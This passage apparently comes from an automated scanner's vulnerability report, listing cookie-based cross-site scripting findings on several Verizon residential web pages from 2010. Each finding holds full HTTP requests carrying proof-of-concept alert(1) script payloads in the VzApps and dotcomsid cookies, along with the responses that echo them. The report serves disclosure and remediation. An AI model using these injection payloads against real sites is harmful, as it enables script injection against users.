Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=226d7"-alert(1)-"1d917d73025; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 85594
Expires: Sat, 20 Nov 2010 02:56:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:44 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "226d7"-alert(1)-"1d917d73025"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: docu
...[SNIP]...

2.981. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload af320'><script>alert(1)</script>638530528ed was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXaf320'><script>alert(1)</script>638530528ed; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77956
Expires: Sat, 20 Nov 2010 02:56:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:31 GMT; path=/
Set-Cookie: ContextInfo_State=TXaf320'><script>alert(1)</script>638530528ed; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:31 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAF320'><SCRIPT>ALERT(1)</SCRIPT>638530528ED ' />
...[SNIP]...

2.982. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99a3b"-alert(1)-"75f87706d4 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=99a3b"-alert(1)-"75f87706d4; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 84230
Expires: Sat, 20 Nov 2010 02:56:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:14 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:13 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:13 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:13 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:13 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "99a3b"-alert(1)-"75f87706d4"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

2.983. https://www22.verizon.com/Residential/TV/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/TV/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f8583'><script>alert(1)</script>df9eda5005b was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf8583'><script>alert(1)</script>df9eda5005b; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76231
Expires: Sat, 20 Nov 2010 02:57:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:21 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXf8583'><script>alert(1)</script>df9eda5005b; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF8583'><SCRIPT>ALERT(1)</SCRIPT>DF9EDA5005B ' />
...[SNIP]...

2.984. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/Overview.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 79db9'><script>alert(1)</script>84341307296 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
